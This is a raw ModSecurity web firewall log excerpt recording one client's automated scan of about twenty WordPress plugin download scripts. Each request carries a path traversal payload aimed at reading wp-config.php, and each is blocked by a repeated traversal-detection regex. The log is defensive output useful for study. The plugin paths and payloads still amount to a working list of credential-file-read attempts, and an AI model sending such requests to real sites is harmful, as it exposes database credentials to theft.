"(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?name=wp-config.php&path=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php"] [unique_id "ZN-wWEWc94tsnIsHAQ-XYAAAAME"] [Fri Aug 18 12:54:32.981558 2023] [:error] [pid 19445:tid 140103334733568] [client 87.249.132.213:35072] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/se-html5-album-audio-player/download_audio.php"] [unique_id "ZN-wWEWc94tsnIsHAQ-XYQAAAMs"] [Fri Aug 18 12:54:33.075937 2023] [:error] [pid 18873:tid 140103491151616] [client 87.249.132.213:35074] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/sell-downloads/sell-downloads.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/sell-downloads/sell-downloads.php"] [unique_id "ZN-wWbCcrCl0jrDdhfxXJgAAAEE"] [Fri Aug 18 12:54:33.171134 2023] [:error] [pid 18873:tid 140103267591936] [client 87.249.132.213:35076] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/sf-booking/lib/downloads.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/sf-booking/lib/downloads.php"] [unique_id "ZN-wWbCcrCl0jrDdhfxXJwAAAFM"] [Fri Aug 18 12:54:33.265938 2023] [:error] [pid 18874:tid 140103225628416] [client 87.249.132.213:35078] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php"] [unique_id "ZN-wWVxvK4MFoveIP9_KmAAAAJg"] [Fri Aug 18 12:54:33.360641 2023] [:error] [pid 18872:tid 140103474366208] [client 87.249.132.213:35080] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/simple-fields/simple_fields.php"] [unique_id "ZN-wWfG_rKmCSnA6LxD5dAAAAAM"] [Fri Aug 18 12:54:33.454551 2023] [:error] [pid 18872:tid 140103259199232] [client 87.249.132.213:35082] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/simple-image-manipulator/controller/download.php"] [unique_id "ZN-wWfG_rKmCSnA6LxD5dQAAABQ"] [Fri Aug 18 12:54:33.548951 2023] [:error] [pid 18872:tid 140103309555456] [client 87.249.132.213:35084] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"] [unique_id "ZN-wWfG_rKmCSnA6LxD5dgAAAA4"] [Fri Aug 18 12:54:33.642854 2023] [:error] [pid 19445:tid 140103225628416] [client 87.249.132.213:35086] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/site-import/admin/page.php?url=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/site-import/admin/page.php"] [unique_id "ZN-wWUWc94tsnIsHAQ-XYgAAANg"] [Fri Aug 18 12:54:33.737093 2023] [:error] [pid 18873:tid 140103376697088] [client 87.249.132.213:35088] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/sniplets/modules/syntax_highlight.php"] [unique_id "ZN-wWbCcrCl0jrDdhfxXKAAAAEY"] [Fri Aug 18 12:54:33.831111 2023] [:error] [pid 18873:tid 140103465973504] [client 87.249.132.213:35090] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/spicy-blogroll/spicy-blogroll-ajax.php?var2=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/spicy-blogroll/spicy-blogroll-ajax.php"] [unique_id "ZN-wWbCcrCl0jrDdhfxXKQAAAEQ"] [Fri Aug 18 12:54:33.949379 2023] [:error] [pid 18873:tid 140103225628416] [client 87.249.132.213:35092] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/tera-charts/charts/treemap.php?fn=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/tera-charts/charts/treemap.php"] [unique_id "ZN-wWbCcrCl0jrDdhfxXKgAAAFg"] [Fri Aug 18 12:54:34.044484 2023] [:error] [pid 18873:tid 140103474366208] [client 87.249.132.213:35094] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/tera-charts/charts/zoomabletreemap.php"] [unique_id "ZN-wWrCcrCl0jrDdhfxXKwAAAEM"] [Fri Aug 18 12:54:34.142425 2023] [:error] [pid 19445:tid 140103301162752] [client 87.249.132.213:35096] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/thecartpress/checkout/CheckoutEditor.php?tcp_save_fields=true&tcp_class_name=asdf&tcp_class_path=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/thecartpress/checkout/CheckoutEditor.php"] [unique_id "ZN-wWkWc94tsnIsHAQ-XYwAAAM8"] [Fri Aug 18 12:54:34.246849 2023] [:error] [pid 19445:tid 140103343126272] [client 87.249.132.213:35098] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/thinkun-remind/exportData.php?dirPath=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/thinkun-remind/exportData.php"] [unique_id "ZN-wWkWc94tsnIsHAQ-XZAAAAMo"] [Fri Aug 18 12:54:34.341629 2023] [:error] [pid 19445:tid 140103499544320] [client 87.249.132.213:35100] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php"] [unique_id "ZN-wWkWc94tsnIsHAQ-XZQAAAMA"] [Fri Aug 18 12:54:34.437028 2023] [:error] [pid 19445:tid 140103368304384] [client 87.249.132.213:35102] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/ungallery/source_vuln.php"] [unique_id "ZN-wWkWc94tsnIsHAQ-XZgAAAMc"] [Fri Aug 18 12:54:34.531214 2023] [:error] [pid 19445:tid 140103326340864] [client 87.249.132.213:35104] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/website-contact-form-with-file-upload/lib/wide-image/image-processor.php?demo=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/website-contact-form-with-file-upload/lib/wide-image/image-processor.php"] [unique_id "ZN-wWkWc94tsnIsHAQ-XZwAAAMw"] [Fri Aug 18 12:54:34.625674 2023] [:error] [pid 19445:tid 140103317948160] [client 87.249.132.213:35106] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wechat-broadcast/wechat/Image.php?url=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wechat-broadcast/wechat/Image.php"] [unique_id "ZN-wWkWc94tsnIsHAQ-XaAAAAM0"] [Fri Aug 18 12:54:34.727498 2023] [:error] [pid 19445:tid 140103284377344] [client 87.249.132.213:35108] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wordtube/wordtube-button.php"] [unique_id "ZN-wWkWc94tsnIsHAQ-XaQAAANE"] [Fri Aug 18 12:54:34.836982 2023] [:error] [pid 18872:tid 140103275984640] [client 87.249.132.213:35110] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-custom-pages/wp-download.php"] [unique_id "ZN-wWvG_rKmCSnA6LxD5dwAAABI"] [Fri Aug 18 12:54:34.931401 2023] [:error] [pid 18873:tid 140103343126272] [client 87.249.132.213:35112] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php"] [unique_id 